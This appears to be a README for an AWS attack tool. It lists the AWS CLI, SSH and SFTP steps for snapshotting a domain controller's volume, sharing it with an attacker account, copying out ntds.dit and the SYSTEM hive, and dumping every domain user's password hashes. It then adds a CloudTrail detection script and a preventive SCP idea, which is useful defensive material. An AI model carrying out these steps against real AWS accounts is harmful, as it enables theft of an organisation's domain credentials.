This tool implements a cloud version of the Shadow Copy attack against domain controllers running in AWS. Any AWS principal holding the `ec2:CreateSnapshot` permission can obtain the password hashes of every domain user: it snapshots the Domain Controller's volume, mounts that snapshot on an instance it controls, and copies out the NTDS.dit database and the SYSTEM registry hive for use with Impacket's secretsdump. Note that this requires no access to the Domain Controller itself, only to the AWS control plane.
- Load the AWS CLI with the victim's credentials (at least `ec2:CreateSnapshot` permission is required)
- Run `describe-instances` and list the results so the attacker can select an instance
- Run `create-snapshot` on the volume of the selected instance
- Run `modify-snapshot-attribute` on the new snapshot to add the attacker's AWS account to its `createVolumePermission`
- Load the AWS CLI with the attacker's credentials
- Run `run-instances` to create a new Linux EC2 instance with a volume built from the stolen snapshot
- Over SSH, run `sudo mkdir /windows`
- Over SSH, run `sudo mount /dev/xvdf1 /windows/`
- Over SSH, run `sudo cp /windows/Windows/NTDS/ntds.dit /home/ec2-user`
- Over SSH, run `sudo cp /windows/Windows/System32/config/SYSTEM /home/ec2-user`
- Over SSH, run `sudo chown ec2-user:ec2-user /home/ec2-user/*`
- Over SFTP, get `/home/ec2-user/SYSTEM ./SYSTEM`
- Over SFTP, get `/home/ec2-user/ntds.dit ./ntds.dit`
- Locally, run `secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets` (expects `secretsdump.py` to be on the PATH)
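The control-plane steps above (create-snapshot followed by modify-snapshot-attribute sharing the snapshot with another account) leave a clear trail in CloudTrail. The following detection logic is an added example, not part of this tool: it correlates the two event types and flags any snapshot shared outside a trusted set of accounts, escalating when the source volume belongs to a domain controller. The CloudTrail records, account IDs and volume IDs are constructed placeholders, and the field names follow the CloudTrail EC2 event shape as assumed here.

```python
# Constructed sample CloudTrail records (account and resource IDs are placeholders).
SAMPLE_EVENTS = [
    {"eventName": "CreateSnapshot",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/dev"},
     "requestParameters": {"volumeId": "vol-0dc0000000000001"},
     "responseElements": {"snapshotId": "snap-0aaa000000000001"}},
    {"eventName": "ModifySnapshotAttribute",
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/dev"},
     "requestParameters": {"snapshotId": "snap-0aaa000000000001",
                           "attributeType": "CREATE_VOLUME_PERMISSION",
                           "createVolumePermission": {"add": {"items": [{"userId": "999999999999"}]}}}},
    {"eventName": "ModifySnapshotAttribute",  # benign: shared with a trusted backup account
     "userIdentity": {"arn": "arn:aws:iam::111111111111:user/backup"},
     "requestParameters": {"snapshotId": "snap-0bbb000000000002",
                           "attributeType": "CREATE_VOLUME_PERMISSION",
                           "createVolumePermission": {"add": {"items": [{"userId": "222222222222"}]}}}},
]


def find_foreign_snapshot_shares(events, trusted_accounts, sensitive_volumes):
    """Return one finding per snapshot shared with a principal outside trusted_accounts.

    CreateSnapshot events are used to map snapshotId -> source volumeId so that a
    share of a snapshot taken from a sensitive volume (e.g. a domain controller's
    system disk) is rated 'critical'. A public share (group 'all') is always foreign.
    """
    snapshot_source = {}
    findings = []
    for ev in events:
        params = ev.get("requestParameters") or {}
        name = ev.get("eventName")
        if name == "CreateSnapshot":
            snap = (ev.get("responseElements") or {}).get("snapshotId")
            if snap:
                snapshot_source[snap] = params.get("volumeId")
        elif name == "ModifySnapshotAttribute":
            add = (params.get("createVolumePermission") or {}).get("add") or {}
            targets = [i.get("userId") or i.get("group") for i in add.get("items", [])]
            foreign = [t for t in targets if t not in trusted_accounts]
            if not foreign:
                continue
            snap = params.get("snapshotId")
            volume = snapshot_source.get(snap)  # None if the snapshot predates the log window
            findings.append({
                "snapshotId": snap,
                "sourceVolume": volume,
                "sharedWith": foreign,
                "actor": (ev.get("userIdentity") or {}).get("arn"),
                "severity": "critical" if volume in sensitive_volumes else "high",
            })
    return findings
```

Feed it the flattened `Records` of your CloudTrail export and a set of your own account IDs; in practice an SCP or IAM condition denying `ec2:ModifySnapshotAttribute` to untrusted accounts is the preventive counterpart.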